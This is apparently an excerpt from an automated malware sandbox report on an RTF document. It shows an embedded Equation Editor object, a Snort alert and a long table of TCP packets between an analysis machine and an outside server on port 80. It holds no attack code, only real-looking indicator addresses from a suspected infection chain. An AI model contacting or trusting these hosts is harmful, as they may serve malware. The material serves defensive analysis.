                                                                                                                                                            Static RTF Info

                                                                                                                                                            Objects

                                                                                                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                            000001CCBh2embeddedeQuATION.3834994no

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            11/26/20-08:46:10.744772TCP1201ATTACK-RESPONSES 403 Forbidden804917034.102.136.180192.168.2.22

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 26, 2020 08:44:06.539177895 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.719369888 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.719521046 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.720232010 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.900260925 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.900933027 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.900969982 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.900993109 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901015997 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901037931 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901063919 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901091099 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901108980 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901110888 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901134968 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901139021 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901144028 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901148081 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901159048 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:06.901165962 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901185989 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.901226044 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:06.908030987 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.117697954 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117738008 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117760897 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117782116 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117804050 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117820978 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117836952 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117851973 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117867947 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117887020 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117899895 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117912054 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117928028 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117944002 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117960930 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117961884 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.117974043 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117985964 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.117997885 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118005037 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.118057013 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.118916035 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118940115 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.118998051 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.119949102 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298139095 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298182011 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298197985 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298209906 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298222065 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298238993 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298255920 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298273087 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298286915 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298305988 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298330069 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298347950 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298372984 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298393965 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298413992 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298434973 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298453093 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298475027 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298475027 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298499107 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298499107 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298501968 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298508883 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298511028 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298512936 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298515081 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298518896 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298535109 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298542023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298552036 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298567057 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298583031 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298587084 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298599005 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298609972 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298624039 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298631907 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298643112 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298650026 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298674107 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298676968 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298691988 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298701048 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298711061 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298719883 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298737049 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298739910 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298753023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298755884 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298768997 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298772097 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298784971 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298790932 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298799992 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298805952 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298815966 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298824072 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298830986 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298835993 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298854113 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298867941 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.299823999 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.299849987 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.299869061 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.299885988 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.299925089 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.299997091 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.300129890 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.478960991 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479022026 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479063034 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479101896 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479146004 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479175091 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479192019 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479204893 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479213953 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479216099 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479243040 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479244947 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479275942 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479285002 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479305983 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479317904 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479336023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479343891 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479365110 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479373932 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479393959 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479403973 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479424000 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479432106 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479456902 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479461908 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479492903 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.479494095 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479532003 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.479996920 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480040073 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480066061 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480076075 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480081081 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480118036 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480124950 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480166912 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480179071 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480204105 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480206966 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480241060 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480242968 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480278969 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480282068 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480314970 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480324030 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480353117 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480364084 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480391979 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480391979 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480432987 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480438948 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480479956 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480489969 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480516911 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480520010 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480556011 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480557919 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480595112 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480607033 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480631113 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480633974 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480669022 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480670929 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480705023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480707884 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480745077 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480751038 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480793953 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480803967 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480830908 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480832100 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480868101 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480871916 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480906010 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480915070 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480941057 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480946064 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.480981112 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.480983973 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481017113 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.481020927 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481056929 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481064081 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.481082916 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481103897 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481105089 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.481142044 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.481144905 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481178999 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.481180906 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481216908 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.481220961 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.481255054 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.486259937 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.487327099 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.659861088 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.659893990 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.659905910 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.659918070 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.659930944 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.659944057 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.659961939 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.659981012 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.660099983 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.660228014 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.661995888 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662034988 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662059069 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662084103 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662106037 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662132025 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662147999 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662157059 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662167072 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662175894 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662179947 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662204981 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662206888 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662229061 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662230015 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662246943 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662251949 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662267923 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662275076 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662293911 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662297010 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662316084 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662324905 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662338018 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662360907 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662364006 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662383080 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662391901 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662405014 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662412882 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662430048 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662437916 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662453890 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662453890 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662472963 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662482977 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662489891 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662497997 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662507057 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662523031 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662548065 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662555933 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662565947 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662578106 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662597895 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662611961 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662620068 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662631989 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662642956 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662647963 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662662029 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662666082 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662679911 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662691116 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662715912 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662720919 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662733078 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662740946 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662759066 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662767887 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662776947 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662790060 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.662813902 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.662827015 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.663412094 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.666342974 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.666369915 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.666382074 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.666393995 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.666467905 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.667262077 CET8049167104.168.198.45192.168.2.22
